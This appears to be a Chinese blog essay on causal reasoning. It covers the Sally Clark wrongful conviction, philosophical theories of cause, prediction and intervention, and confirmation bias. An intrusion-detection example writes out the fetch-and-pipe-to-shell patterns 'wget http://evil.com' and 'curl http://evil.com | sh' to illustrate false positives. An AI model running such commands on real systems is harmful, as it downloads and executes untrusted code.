关于因果性的讨论，什么是因果推理、以及因果推理和法律和心理学方面的联系

1. 引言，这次谈谈因果

0x1：从一个法律误判案件看了解因果关系和因果推理的重要性

1999年，一个名叫Sally Clark的英国律师被法庭判定谋杀了她的两个孩子。

原因是，1996年12月，她的第一个儿子在11周大的时候突然死亡，就在第一个孩子夭折一年多以后，Clark的第二个儿子又在 8周大的时候似然了。在这两个案件中，两个孩子似乎都没有什么生理上的疾病。于是，他们的突然死亡引起了人们的怀疑。

现在摆在英国检方面前的可能有两种：

这个家庭的两个孩子都死于婴儿猝死综合征（SIDS）
该母亲谋杀了自己的两个孩子

当时检方分析了这个案情，对可能的原因进行了以下的推论过程：

两起死亡案件有很多共同之处，
- 孩子们死的年龄差不多
- 他们的死都是由 Clark 发现的，当时家里只有 Clark 和孩子在一起
- 验尸报告上表明两个孩子身上都有伤
婴儿猝死综合征（SIDS）是一个小概率事件（约为1/8543），在同一个家庭的两个婴儿都死于婴儿猝死综合征的概率几乎为零（大约为1/7300万）。

最后检方判定该母亲谋杀罪名成立，检方的理由是，两起死亡一定有背后原因，将所有的2个原因都列出后，一个原因的可能性几乎为零，所以一定就是另一个原因。最终造成了这桩著名的冤案。

统计学家和因果关系研究者都知道这个案例，其主要原因在于，检方的论据本质上基于这样的逻辑：被告的辩词几乎不可能为真，所以一定是假的。即所谓的疑罪从有。

现在案情讲完了，我们来逐层解剖分析一下这个导致这个冤案的原因是什么。

首先，从技术层面上来看，这个统计结果的计算方式就存在问题。同一个家庭两个婴儿都死于SIDS的概率不能简单地直接将单个原子事件的概率相乘，它直接不加研究地就假定这些事件都相互独立的。但在这里，引发SIDS的原因还不确定，也许和孩子所处的环境有关（比如家里是否有人吸烟和饮酒）。这意味着，如果一个家庭发生过一起SIDS，那么这个家庭发生第二起SIDS的概率就会远大于1/8543，因为这些孩子的生活环境和遗传基因都是相同的。也就说，第一起死亡事件会透露第二起死亡事件发生的概率，这在信息论中就是互信息的概念。
不过此案的问题不仅仅是误算概率那么简单。在整个案件中，检方试图将事件（两起SIDS死亡事件）发生的1/7300w的概率等同于 Clark 无罪的概率。这种错误的推理将事件发生的概率当成了被告有罪或者无罪的概率，这就是我们所说的检察官谬误。

那检察官谬误的关键问题在哪里呢？

我们知道，无论一件事发生的概率有多低，只要尝试的次数足够多，最后一定会发生。

Clark 一案中，那个误算出来的极低的概率（1/7300w）比中博彩的概率（1/2亿五千万）还要高3倍多。一个人中大奖的概率是极低的，但是如果我们说某个地方的某个人会中大奖，这个概率又如何呢？那就高的多了。

这就说明，仅通过概率来判断一个人的清白一定会导致一些冤案。这是因为虽然对某个特定的家庭来说，发生这件事的可能性很小，但是世界上有两个孩子的家庭有上百万个，这种事件总会在某个地方的某个家庭发生。对单个特定家庭来说是小概率事件，对整个群体集来说就成为大概率事件了。

抽象来看，这个冤案最根本的原因是，此案试图用一个事件发生的概率来支撑某个特定的因果结论。

生活中经常有这样的推理：

公司来了一名新员工，而同一天你的订书机不见了
一名巫师知道你最喜欢的字母是M
两名重要认证记得那名嫌犯穿的是一件红色法兰绒衬衫

但是，如果因某件事情不太可能发生，而说其唯一合理的解释就是因果关系，那一定是错误的。

2. 何为原因

0x1：”原因“的定义的理论发展历史

”原因“一词一般是指：它使某种结果更有可能出现，并且没有它某种结果就不会出现或者无法出现，或者说它能够在适当的环境下产生某种结果。

”原因“最早的一种定义来自亚里士多德，他认为原因是用来回答”为什么“的。

亚里士多德认为，很多时候如果我们问为什么某件事是这样的，人们的回答并不是在回答真正的原因，例如，

人们可能会解释这个现象是如何产生的，比如：水加热后会产生蒸汽
这个事物的成分是什么，比如：氢气和氧气的结合会形成原
这个事物是什么样的，比如：椅子的本质就是高出地面的、有靠背的、用来让人坐的东西
或者为什么要做这件事，比如：疫苗是用来预防疾病的

然而，在寻找原因的时候，我们想了解的是为什么发生的是这件事，而不是那件事。

在亚里士多德之后还出现了其他里程碑式的成就，比如13世纪阿奎那的贡献，然后真正的巨大飞跃却发生在文艺复兴末期的科学革命时期。在这个时期，伽利略、牛顿、洛克等人取得了巨大成就。

但是真正为当今因果关系思维和寻找因果关系的方法论奠定基础的是18世纪的大卫.休谟，它以一种批判性的方式重新定义了这个问题。

休谟不单单提出了”是什么使得某事成为了原因“，而是将这一问题一分为二：

何为原因？
如何才能找到原因？

更重要的是，休谟没有去寻找能够区别原因与非原因的特征，而是从本质上将二者的关系提炼成了经常性事件。也就说，我们通过经常性地观察事件发生的规律来了解因果关系，而且也只能通过经历这些有规律的事件来了解原因。

但后来的发展证明休谟的观点有一些重大的理论问题，例如：

蚊虫叮咬是传染疟疾的必要前提
但春季冰淇淋小贩的突增却不是天气变暖的必要前提

显然，对上面的例子，我们无法仅通过观察就找出经常性事件（天气与冰淇淋小贩）与必要性事件（蚊子与疟疾）之间的差异。只有在出现反例时，比如天气已经变暖，而冰淇淋摊位并没有增加，我们才能了解到冰淇淋小贩并不是气温变化的必要条件。

在休谟的观点中，原因在时间上早于结果，还要求原因和结果在时间和空间上的距离都要相近（相邻）。如果它们在时间和空间上相差太远，那我们将很难发现它们之间的因果关系，因为很多其他因素可能会参杂其中并对结果产生影响。

假设一个朋友借用了你家的咖啡机，在她归还后的第三个月你发现机器坏了，这时你就很难将责任归咎于你的朋友。但如果她归还机器的时候你就发现机器坏了，那就很容易将责任归咎于她了。

但事实上，由于观测手段等原因，存在着一些原因并没有发生在结果之前发生的情况（从观测意义上的），例如开枪时，我们先看到枪火，然后才听到巨大的响声。因为我们总是先看到枪火，再听到枪声，所以可能会认为是枪火引起了枪声，但实际上枪火和枪声都是开枪引起的。只有研究了这两个事件发生的共同原因，我们才能理解这种规律性。

休谟要求原因和结果在时空上具有邻近性，然而有些因果关系却不符合这一要求，比如：

某种因素的缺乏会导致某种结果，就像缺乏维生素C会导致坏血病
某些心理状态（如信念或意图）作为原因，和导致的结果之间没有物理上的联系，比如：
- 学生做作业可能是为了得高分，但是这种得高分的欲望和做作业的行为之间没有物理上的联系
有一些时间跨度上很长的因果事件，比如：
- 因环境因素而导致的健康问题

按照休谟的理论，如果我们多次在看到有人按蜂鸣器之后听到声响（经常性的联系），就会由此推断按蜂鸣器会导致这种声响。之所以如此推断，是因为我们看到人的手指接触到了（空间邻近性）按钮，而接触到按钮的行为发生在声响之前（时序性），而且在手指接触按钮后几乎立即（时间邻近性）产生了声响。

相反，如果这两件事之间有很长的延迟，或者这两件事同时发生，或者蜂鸣器并不是每次都会发出声响，那我们就不能做此推断了。

值得注意的是，并不是所有人都赞长休谟的观点，尤其是康德。康德不赞成休谟把因果关系简化为规律，他认为必然性是因果关系的基本特征，而且由于我们无法凭经验推理出事物之间的必然联系，也就无法通过观察归纳出事件发生的原因。相反，他认为我们可以用一种先验知识去阐释我们所观察到的因果关系。

尽管大部分有关因果关系的定义都是基于休谟的理论建立的，但是没有任何一个定义能够包含所有可能出现的情况，每一个定义都有其他定义所没有的情况。比如说：

某种药物可能只会在个别患者身上出现副作用，所以我们不能假定某个原因必然会产生某种结果
安全带一般可以防止交通事故中的死亡事件，但在有些情况下却可能会引发死亡事件，所以我们需要想到有些因素在不同环境下可能会产生不同的结果

这个问题可以被归结为：我们应该将原因视为这个世界的基石或原始力量，还是我们强加给事物的一种结构？

因果关系在日常生活如此重要，但在哲学上却没有一个公认的关于因果关系的理论，也没有什么万无一失的计算方法能帮助我们准确找到因果关系，这让人有点惊讶。但更棘手的是，由于人们对”原因“的定义不同，所以同一情况下，人们可能会将不同的因素视为事件发生的原因。比如：

鲍勃遭遇了抢劫，而且劫匪想要杀人灭口，但在抢劫的过程中，鲍勃心脏病突发，随后死亡，

我们可以将鲍勃的死因归咎于生理机制（心脏病发作），并进一步追溯到心脏病的根源，遗传基因，这种基因大大增加了心脏病突然致死的概率
或者将鲍勃的死因归咎于抢劫事件，因为如果没有遭遇抢劫，鲍勃的心脏病就不会发作

这两种死因都解释得通，我们无法立即搞清楚哪个解释更合理，或者它们只是对一个事件的两种分析。又或者，也许是心脏病发作和抢劫事件共同导致了鲍勃的死亡，这两个事件的影响是不可分割的。

3. 为什么需要原因

原因难以界定又不易寻找，那么它们对我们究竟有什么好处呢？我们又为什么需要它们呢？有三件很重要的事只有在清楚原因的情况下才能做到，或者说做好，

预测
解释
干预

0x1：预测

首先，假设我们想要预测谁会赢得美国总统大选。专家们找到了各种规律，比如：

共和党人必须赢得俄亥俄州的选票才能赢得大选
自富兰克林.罗斯福之后，没有任何一位总统能够在失业率超过7.2%时获得连任
美国从来没有女性总统

然而这些仅仅是基于目前已知的很小的数据集上得到的简单规律而已，我们可以从历任总统的数据上得到很多这类规律，但是我们无法从中得到他们为什么会赢得大选，

人们是根据失业率投票的吗？
还是说失业率只是间接反映了国家形势和经济状况，暗示人们在失业率高的时候要寻求变革？
更糟糕的是，由于数据量太小，美国历史上只有44位总统，其中连任的总统还不到一半，像没有女性总统这种规律就完全没有参考价值可言的

这就是所谓的在小样本集下，概率分布是有偏的问题。

这就是黑盒问题：我们把数据输入黑盒子，然后从中得出一些预测，但是黑盒子不会对这些预测做出任何解释，也不会告诉我们这些预测为什么值得信赖。如果我们不知道这些预测为何会成真，也就无法预测它们未来可能的失败。

反之，只有洞察了真正的原因，我们才能对未来进行有效地预测。如果我们知道俄亥俄州能够”决定“一场大选的原因是这个州的人口特征十分具有代表性，而且这个州从来不属于某一个政党，那么我们就能由此预测。如果由于移民人口导致俄亥俄州的人口组成发生了巨大变化，那么之前的预测（它对大选有决定性作用）也就不复存在了。如果这周州这是反映了全国总体趋势的一个间接指标，那还可以通过全国民意调查来获得更直接、更准确的预测。一般来说，与相关性相比，原因能够为我们提供更为可靠的方法来预测事件的结果。

上述讨论可以用如下的逻辑关系图来简化表示：

某区域人口结果 ->(决定)-> 某地区的选票结果 ->(反映总体趋势)-> 全国的总体选票结果

0x2：解释

我们想知道为什么有些事情是相互关联的。

视力模糊和体重下降之间有什么联系？如果只知道这两个症状经常相伴出现，是无法得出更多信息的。只有找到导致这二者的共同原因，糖尿病，我们才能理解它们之间的关联。
有很多”食用红肉的人群死亡率更高“的研究，但如果你不知道其中的原因，那么这些信息就是不可用的。也许吃红肉的人喜欢饮酒或不爱运动，这些都是影响死亡率的因素。而且，即便死亡率的升高真的是红肉引起的，那也要根据具体情况来决定用何种方法来降低这种风险。如果死亡率的升高是不卫生的烧烤方式造成的，那我们可以换一种烹调方法，如果是吃红肉本身引起的，那我们就只能让自己成为素食主义者了

有些时候，我们要去解释一些事件发生的原因，例如：

你上班为什么迟到了？
某人为什么生病了？
为什么一个国家入侵了另一个国家？

在这些情况下，我们想知道是谁或者什么因素引发了某个事件，我们可能会得到一些表面结论，但可能并不是这些事件发生的真正原因，正如我们在第二章对原因的定义所说的。

迟到与交通有关：某个现象发生的原因
随着年龄的增长，人们会患上各种疾病：某个现象发生的原因
很多战争都是由于人们在意识形态上存在分歧：为什么要做这件事

找到事件的根源很重要，它不但会影响政策的制定与责任的归属，还会影响人们对某件事的反应。

0x3：干预

因果关系最重要的用途是可以用来干预某些事情的发生。我们不仅想知道某些事情为什么会发生，更想利用这些信息来预防或促成某些结果的产生。例如：

我们想知道如何通过改变饮食习惯来改善身体的健康状况。需要复用维生素吗？需要坚持吃素吗？还是要戒掉碳水？
我们想要评估已经采取的干预措施是否有效，纽约市在发布事物的卡路里值后，是否改善了市民的健康状态？
我们想要预测将来可能会采取的干预措施的效果，比如减少快餐中的纳含量，会出现什么情况？

政府部门必须知道他们的政策会对民众产生什么样的影响，并且必须制定出能满足民众需求的政策。

比如，研究人员发现含钠量高的食物与肥胖真有关。于是，立法人员决定颁布一项法案，旨在减少餐厅食物和包装食品的含钠量。

但是，如果含钠量和肥胖症之间的唯一联系是，高热量的快餐食品导致了肥胖症，而这些食品正好含钠量高，那么这项方案将不会起到任何作用。因为人们依然会购买快餐，而快餐才是一开始就应该关注的问题。

笔者举例：

又比如，当遭受到某个恶性计算机病毒入侵时，服务器在会短时间内（常常是10s内）启发大量的新进程，并伴随着大量的进程写文件及网络外连行为。但我们可以据此就判断说，当我们观测到当某个时间窗口内，发现有大量的进程启动、网络外连、进程写文件的时候，就一定意味着该服务器当前正在后者已经遭受恶意病毒的攻击了吗？

显然这种预测模型就是错的！那做出这种错误的预测的原因是什么呢？

问题的根源在于：服务器所表现出的进程和网络异常行为并不是服务器遭到入侵的原因，计算机病毒的植入和启动才是，同时，进程和网络的异常行为是因为计算机病毒入侵而引发的。进程和网路的异常行为和服务器被入侵只是协同出现了而已。

计算机病毒入侵 ->(引发)-> 进程、网络异常行为(可观测现象) / 服务器遭到入侵(某种结果)

接下来的问题是，我们是否可以基于观测到的进程、网络异常行为来判定服务器当前遭受到了入侵？答案是否定的，或者说是要存疑的。

也许进程、网络异常行为对服务器入侵存在一定概率上的预测成功率（98%），这是因为这两件事存在着一定程度上的相关性。也许从工程上来看，这个结果还不错，如果对精确度要求不是那么高的话，这个模型也许可以上线，然后在日常运行中会偶尔遇到一些误报。

但是从严谨的因果推理角度来说，这个模型是完全不合理的！因为其他的原因也同样会引发进程、网络异常行为，例如

gcc编译源代码的时候，在短时间内会有大量的进程创建和进程写文件行为
系统在进行软件升级的时候，在短时间内会有大量的进程写文件和网络外连行为

一旦发生这些现象，基于上面模型进行了入侵检测就会遇到所谓的误报，这种误报不是简单的说【数据质量有问题】、【特征工程不够精准】、【缺少专家经验】这么简单。而在于一开始，模型开发者就没有遵循因果推理的基本原因，将一个非原因的观测量视作原因构建预测模型，这样得到的结果一般来说就是不可预测的，就算获得98%的验证结果也只能是暂时运气好，一旦遇到黑天鹅事件，就会引发大量的误报。

正确的做法是，基于计算机病毒检测来判断当前服务器是否遭到了入侵，只有基于准确原因的预测模型，才不会遭遇到所谓的黑天鹅误报事件。

笔者举例：

又比如网络安全的另一个热门领域，入侵检测。从一般上来，入侵检测中的因果关系链如下：

黑客利用服务器的某个漏洞并植入了恶意指令 ->(引发)-> 服务器上启动了一系列异常指令(现象) ->(伴随)-> 服务器遭受到入侵

网络安全工程师常常会基于特征检测的思想，从观测数据中抽象出一些黑客常用恶意指令的模式（例如正则），

wget http://evil.com
curl http://evil.com | sh

这些指令（信标）在多数情况下可以指示服务器遭到了入侵，但是不可避免地会在某些时候遇到所谓的”误报问题“，大多数是由于管理自己操作或者某个合法软件进行远程软件升级时，也同样触发了这些指令，即：

管理员操作、或软件远程升级 ->(引发)-> 服务器上启动了一系列异常指令(现象)

这个问题的背后本质就是我们上面的说的，因果关系寻找不准确问题，引发服务器入侵的真正原因是黑客的入侵，发现”所谓恶意指令的执行“只是因为黑客入侵的一个结果，而这个结果同时又是伴随着服务器入侵这个结果一起出现的，”恶意指令执行“和”服务器遭到入侵“是协同发生的两个结果。

对于这个困局，解决或者缓解的方法是什么呢？简单来说就是，减少目标原因和非目标之间的交集。

我们用集合论的视角来理解这个原理，

如果我们能通过算法、模型优化、或者改变数据采集的渠道和方式，找到一个”仅限于黑客人入侵会执行的异常指令集合“（现象子集），则这个现象子集和黑客入侵这个原因是完全一一对应的，而且和管理员正常操作等其他原因没有任何联系。那么这样得到的预测模型就是没有误报的。

基于这样的分析，入侵检测就变成了一个模型优化的问题，我们只要对能够对黑特征模式进行有效的优化（正则优化、或者基于更长的行为序列进行分析），即使无法遵循因果推理，也能基于相关性推理完成入侵检测。

但在实际的工程实践中，上述集合图往往是理想模型，大部分时候，黑客入侵和管理员正常操作者两个原因是混杂在一起的，很难完全找到明确的分界线。这就导致这两个原因对应的可疑指令也存在判断的盲区，我们基于可疑指令，很难100%说没有误报。在工程中，很多时候我们都是取一个可接受的平衡点，在效果和精确度之间寻找最佳平衡。

笔者总结：

我们必须保证我们的干预措施针对的是真正影响结果的原因。如果我们只干预了一些与结果相关的因素，那这样的干预措施是不会有效果的。

4. 如何寻找原因

0x1：寻找因果关系的理论框架

自休谟以来，因果关系研究领域所面临的主要问题是：我们该如何区分包含因果关系的事件和不含因果关系的事件。

20世纪六七十年代出现了三种主要的研究方法，都建立在休谟的理论基础之上，

单一的原因不太可能引起某种结果，所以 John L. Mackie 提出了一个理论，他认为某种结果的产生是由一系列条件共同导致的。这一理论很好得为我们排除了不包含因果关系的事件，并且解释了原因的复杂性。
类似地，许多因果关系都包含偶然性因素，在这类情况下，原因可能只是提高了某种结果出现的可能性，但并不保证它一定会出现。针对这一特征，Patrick Supper 及其他研究者们提出了概率法。
休谟的理论还促成了反事实推理法（类似数学上的归谬法），即通过假设导致某件事的原因不存在，事情的发展会有何不同，从而来界定这一事件发生的原因。比如说，某个人是赢得一场比赛的主要原因，因果如果没有他，这场比赛就不会赢

哲学上的这些方法似乎已经脱离了寻找因果关系的计算方法，但这些不同的因果思维却能为我们提供许多方法去寻找因果关系的证据。

对于计算机科学家来说，人工智能的梦想之一就是实现自动推理，要做到这一点，关键之一在于找到事件发生的各种原因，并利用它们来形成各种解释。

这项工作在现实中得到了广泛的应用，例如：

机器人的生产，机器人需要使用现实世界的各种模型来计划自己的行为，并预测这些行为的结果
广告宣传，亚马逊如果知道你在点击”现在购买“按钮的原因，就能向你推荐更适合你的商品
医疗服务，重症监护病房里的患者的身体状况突然发生变化时，会向医生发出警报
网络安全入侵检测，安全专家如果能知道服务器遭到入侵的真实原因指标，就可以开发出更精准的检测模型

对于上述问题，要想制定出算法（解决问题的一系列步骤），我们需要对问题进行精准的描述。要想设计出能够找到原因的计算机程序，我们需要对原因进行定义。

0x2：概率图模型，一种寻找因果关系的理论方法

20世纪80年代，以 Judea Pearl 为首的计算机科学家们向人们证实了，以概率来定义因果关系的哲学理论可以用图表来表示。这些图表可以向人们直观地呈现出事件之间的因果关系，并为人们提供了针对不同变量之间的数学关系进行编码的方法。这就是概率图模型。

更为重要的是，他们还引入了一些根据先验知识来构建图表以及从数据中寻找它们的方法。

在过去的几十年中，科学家们设计了一些能够自动从数据中寻找解释的方法，以及测试这些解释是否符合实际。尽管这些方法取得了一定的成功，但是依然面临着许多挑战，尤其是我们对数据的依赖程度已经越来越高。

我们现在所面临的不是那些为了研究而精心挑选出来的数据集，而是海量的、不明确的、根据观察得到的数据。

想象我们正面临这样一个简单的问题：根据facebook数据了解人们的人际关系。这里面存在的困难是，

并不是所有人都使用facebook，所以我们只能通过facebook研究一部分人的人际关系。这部分人也许并不能代表所有人，也不能代表你感兴趣的某一类人
人们使用facebook的方式也不尽相同，有些人从来不会显示他们的人际关系，有些人可能会显示虚假的人际关系，还有些人可能不会及时更新他们的个人信息

0x3：因果关系寻找方法面临的挑战

在因果推理中，尚未解决的关键问题包括：从不明确的或缺少变量和未经观察的数据中寻找事件的原因，寻找事件之间的复杂关系，以及寻找偶发事件的原因和结果。比如：

如果我们没有观察吸烟这个变量，是否会错误地把其他因素当作引起肺癌的原因
某件事的结果是一系列事件，而非单个原因导致的
是什么导致了2010年股市的闪电崩盘

5. 因果关系的心理学视角

谈完了因果关系抽象哲学上的一些的定义，接下来我们来拉近视角，从具体的行为科学角度看看因果关系，这一章我们将信息学视角下的因果关系。笔者认为之所以要谈因果关系，是因为因果分析不仅仅是冰冷的数据分析，它更常见的形式是我们每个人对身边和现实世界的感知，是非常具体的一件件事。

0x1：人们产生因果谬误的心理学现象

真相只有一个，人们都想知道真相，但是人们看到的，不过是自己想要的真相。

举一个好玩的故事为例：

张三买了幅画，想挂起来。他有钉子，但没有锤子。邻居有，但他不知道邻居是否愿借。于是他脑中便开始闪现邻居的种种片段：

比如他每次买菜，都锱铢必较。
比如他遇到乞丐，经常不给钱。

种种印象，都指向一个答案——品行不好。 “这样品行的人，怎么会借我锤子呢？”

然后，张三继续开始臆想：

“他怎么能拒绝帮别人这么点小忙呢？”
“而他还自以为我依赖他，因为他有锤子！”

张三越想越生气，越想越愤怒。立马跑出门，按响了邻居门铃。邻居开门，还没来得及说“早安”, 就迎来了张三莫名其妙的谩骂： “留着锤子给自己用吧，你这个恶棍！”

在生活里，尤其是互联网匿名制的社会里，我们常常和张三一样，凭借“我觉得”“我认为”“我臆想”，然后去揣测别人的心思或事情的真相，从而变成了可怕的“键盘侠”和“道德绑架者”。

另一个关于心理学家福勒的实验也可以很好说明这个现象。

福勒找来一批相信星座的人，让他们做了一套性格测试题。然后福勒给每个人做了个分析报告。

测试者约翰收到的报告是这样的：你对自己的要求很高，希望别人能够认可你喜欢你。你尚有很大发展空间，只是并未挖掘这些潜力将其转化为优势。你外表看上去虽然能克制自律，但内心却充满忧虑和不安全感。你喜欢变化和多样的生活，受到约束和限制时会非常不满。有时候你外向、可亲且乐于交际，有时候却内向、谨慎而有所保留。 ………… 约翰给报告打了5分：“和我太像了。”

而事实上，每个测试者收到的报告都是一样的。但绝大部分人都像约翰一样觉得“和我太像了”。

为什么会这样呢？福勒说：如果一个人信星座，那么他就会只留意那些符合自己的诊断，而忽略掉不吻合的信息。

这个现象在工作职场中也非常常见，当某个员工在立项之后，开始在某些项目上投入大量的时间和精力进行研发，它会更加关注和这个项目有关的任何技术新闻与先关问题，而选择性忽略那些与此无关的事情。时间久后，这名员工就会不由自主产生一种心态，自己负责的这块领域是非常重要的一块业务领域，而其他的领域都不如自己这块领域重要。这就很容易导致眼界被锁死在当下的业务领域中，没法从根源和全盘角度来看问题，甚至忽视真正的重要领域而不自知。

后来，多位心理学家也做了类似实验，然后总结出一个心理现象——确认偏误。

什么是确认偏误？

就是如果你一旦相信一个东西了，就会寻找支持自己理论或假设的证据，选择性的注意和收集信息（排斥其他不利信息），并按照支持自己的想法或逻辑来解读获取的信息，从而推导出一个符合自己意愿的事实或真相。其实这个事实或真相是武断的、片面的，所以心理学家称之为“确认偏误”。

确认偏误会引发人性的两大弱点。

第一个人性弱点：每个人只能看见自己想看见的世界。
第二个人性弱点：以自己看见的世界来想象别人。

1. 第一个人性弱点：每个人只能看见自己想看见的世界

观察上面这张图片，你觉得图中间的字符是B还是13？

很多人说：当然是B了。 “因为左面是A，后面是C。”，这部分人是从左到右看的
很多人说：当然是13了。 “因为上面是12，下面是14。”，这部分人是从上到下看的

心理学家麦基说：“当一个人内心充满某种情绪或想法时，心里就会带上强烈的个人偏好暗示，继而就会去现实中搜寻相关信息，最终形成一种“真是如此”心理定势。”

每个人都只能看见自己想看见的世界，每个人看见的世界也只是自己内心的世界。

2. 第二个人性弱点：以自己看见的世界来想象别人

我们都学过《智子疑邻》的故事：

宋国有一个富人，天下大雨，把他家的墙给冲坏了。富人儿子说：“不赶紧修，可能会遭小偷。” 结果当晚，富人家斧子不见了。

富人儿子怀疑是隔壁邻居偷的，于是他悄悄观察邻居的一举一动： “怎么看怎么都觉得他像小偷。”

可过了几天，富人把斧子找到了。富人儿子再观察邻居时， “怎么看怎么都不觉得他像小偷。”

由此可见，我们想要的真相，不过是合乎我们自己口味的真相。我们只相信自己愿意相信的东西，而根本不在乎真相。所以伽达默尔说：“所有的客观都是主观，所有的意见都是偏见。” 我们每个人都是潜在的“键盘侠”。

人们对原因的认知是由他们对现实的感知、基于经验的推理以及已有的知识组成的。

物理学告诉我们：你过你击打一个球，它就会开始滚动。但如果你之前了解的知识是地球一个平面，或者某种巫术能把物体从房间的这头移动到那头，那么你就可能对台球的运动原理做出不同的预测和解释。

本章将讨论我们对因果关系的认知是如何随着时间的变化而发生变化的，以及我们是如何通过对世界的观察和与世界的互动来把握事件发生的原因的。我们将会研究影响因果关系判断的社会因素和文化因素。

0x2：原因寻找与使用的心理学机制

考虑一些生活中常见却很容易遭到忽视的问题，我们是怎么发现开关灯就会亮的？我们是怎么知道是先开枪然后发出的声音，而不是先有声音后开枪的？

因果关系的学习主要包括两点：

感知（对因果关系的直接体验）
推理（对不含因果关系的信息中进行推断）

1. 感知

当我们在感知因果关系时，并不是要通过模式识别的方式将我们所观察到的内容与先前的知识相联系，而是要去亲身体验这种关系。

当看到一块砖头飞进窗户
一个台球被另一个台球撞击后开始滚动
一根火柴点燃了蜡烛

我们会根据这些感官输入而感觉到事件间的因果关系。

但是相反的，像食物中毒、战争和身体健康等现象就无法通过观察而直接感知到它们发生的原因，它必须通过其他方法来进行推理。

感知理论认为，人的大脑中存在某种程序，可以接受外界输入的信息并将这些信息分成有因果关系和没有因果关系的，而不是通过其他线索来寻找事件发生的原因。

进一步的，通过对脑裂者的认知研究，科学家发现感知活动可以独立于推理活动而发生。

另一方面，科学家也发现了感知机制存在的问题，在情景简单的研究中，成年人对自身因果关系感知能力的信任可能会导致他们做出错误的判断。

如果你听到一声巨响，然后看到房间的灯灭了，你就可能认为这两件事是有联系的，但其实是有人在发生巨响的时候正好关了灯，事件发生的时间以及空间上的邻近性等因素会导致人们错误地感知因果关系，从而做出错误的因果关系判断
我们常听说有人在打了疫苗的当天就出现了类似流感的症状，于是有人认为是流感疫苗引起了这些症状。

2. 推理与论证

人们对因果关系的学习，另一条途径是推理与论证。

当试图搞清楚车子为什么会发出奇怪的噪声
或者推断傍晚喝的咖啡导致晚上睡不着觉时

我们无法直接感知到汽车热度和刹车发出噪声的关系，也无法直接感知到咖啡中的兴奋因子是如何影响神经系统的。

相反，我们需要用到另外两种类型的信息：

关于刹车系统工作原理的机械知识
咖啡因的化学特性，以及它是如何影响大脑神经系统的信息传导机制

有两种推理方法是互补的：

一种是利用协同变化法（事件共同发生的频率）
- 例如当刹车片温度超过100度的时候，常常会伴随制动系统发出叮叮的声音
一种是运用广义机械知识（某个原因是如何引起某种结果的）
- 咖啡因的分子化学特性
- 神经元信息传导的物理特性

广义机械知识的寻找往往是十分困难的，这有赖于人类科学共同体对科学前沿的不断探索，在当下的时代中，有许多原因是无法找到一个精确的物理描述公式的，例如鸟类可以飞翔的物理学原理到现在也没有被完全搞明白。

下面我们介绍一些推理论证方法。

1）关联法

在实际的科研工作中，即便我们完全不了解某个原因的作用原理，也可以通过观察原因和结果共同出现的频率来获取一些认知（关联）。这种使用间接信息来寻找原因的过程叫作因果推理。

进行因果推理的方法有很多，但重点是我们不能直接感受到因果关系，而是要通过数据和背景知识来推断因果关系。

心理学有一个经典的因果推理任务：给参与者展示一系列事件，然后让参与者完成一系列任务，比如：

说出是什么原因导致了某种结果，比如
- 某种声音或屏幕上的某种视觉效果
判断是否（或者在多大程度上）是某一个事件导致了另一个事件，比如
- 让参与者通过一系列观察来判断是否是某一个开关点亮了某一盏灯

研究者试图通过改变不同的变量，希望以此来探究影响人们推理因果关系的因素，比如

原因和结果之间的时间延迟
原因和结果之间在空间上的距离
参与者是否与系统进行了互动
因果关系的强度等
人们对结果的预期
- 比如5岁的儿童在实验中会相信一个实际上不可能发生的事件是由魔法引起的，但9岁的儿童和成人则会意识到这不过是魔术而已

休谟对因果推理中的关联法的本质的定义为：如果人们经常看到一些事件同时发生，就会假设它们之间存在因果关系。人类在做出这一假设时依据的案例数量比计算程序依据的数量少得多。但随着手中的数据越来越多，我们也会修正自己的观念。这就是所谓的贝叶斯推理过程。

例如，当你穿了一双新球鞋并连踢进两个球时，你可能会觉得是新球鞋让你表现得如此出色，但在之后的十场球中你却一球未进，这时你可能就会重新思考之前在新鞋与踢球水平之间建立的联系。

但是，如果关联法是我们进行推理论证的唯一方法，那我们要怎样区分事件中共同的原因和共同的结果呢？

比如人们会因为失眠而去看电视、吃零食。同时，看电视、吃零食又会导致失眠。

解决这种问题的方法被称为反向阻断法，这种推理方法的思路是，如果在两个因素都存在的情况下出现了某种结果，在只有第一个因素存在的情况下也出现了同样的结果，那么在没有见到阻断第二个因素所带来的影响的情况下，我们可以推理出第二个因素可能不是导致这种结果的原因。

在现实生活中，如果我既喝咖啡又吃饼干，然后我大部分时候自己都经历充沛，而如果我只喝咖啡，大部分时候也会觉得自己精力充沛，那么我就可以推断出饼干并不影响我的精力是否充沛。

笔者插入：

在利用因果推理进行工程实践的时候，要特别注意【共同的原因】这个问题，很多时候我们从数据中得出的所谓呈现出强相关的两个变量，其背后结构都是【共同的原因】，基于共同原因的相关性推理是不能被当做因果推理模型来用的，否则会引起很多的误报。

2）因果模型法

还有一种方法是因果模型法，它将因果推理和一个名为“贝叶斯网络”的计算模型联系在一起。

这种方法的理念是，可以把原因作为模型的一部分，而不仅仅通过因素间的相关性或者各个因素间联系的强度来寻找事件发生的原因。

3）作用机制推理法

还有一种推理原因的方法是建立在作用机制上的。

简单来说，就是原因是促成结果的一种途径，原因和结果是通过一系列能够导致结果发生的步骤连接在一起的。因此，如果跑步会让人心情变好，那么就一定存在一个跑步可以改变心情的过程，比如跑步能够释放体内的内啡肽。我们也许看不到这个过程中的每一个组成部分，但整个过程存在一个事件链，将原因和结果连接在一起，原因通过这个事件链促成了结果的发生。

0x3：我们是如何得出因果关系的？

1. 通过询问机制性的问题得出因果关系

需要注意的是，因果关系研究与协变关系研究所用的方法是不同的。在因果关系研究中，参与者需要向实验者提一些问题，以便能够解释某个事件是如何发生的。在心理学文献中，这被称为因果推理。

以交通事故为例，研究人员发现参与者的问题主要围绕有可能在事故中起作用的机制，比如驾驶员有身体缺陷吗。而不是倾向性问题，比如那条路上发生的交通事故多吗。

在这种实验中，参与者必须去询问他们想要的信息。

2. 先验估计和后验估计的争论

人们在如何各种关联关系的问题上产生过一些分歧，

有一种观点是，我们应该先收集数据，然后根据这些数据来选择最可能出现的结构，或者与我们的观察结果最一致的结构。如果我们知道狗听到大的声音就会叫，也知道摔门会发出大的声音，那我们就能缩小范围，缩减这些事件相关联的可能性的方式，并且排除掉“狗引起了声响”这样的模型
还有一种观点认为，很多时候我们都是依靠各种假设来思考问题的，所以我们应该先提出一个有可能出现的结构，然后再根据了解到的新信息不断改变这个结构

3. 贝叶斯融合方法

人们常常会把观察到的信息和已知的信息进行融合，并且与一些与相关性和作用机制有关的知识进行融合。

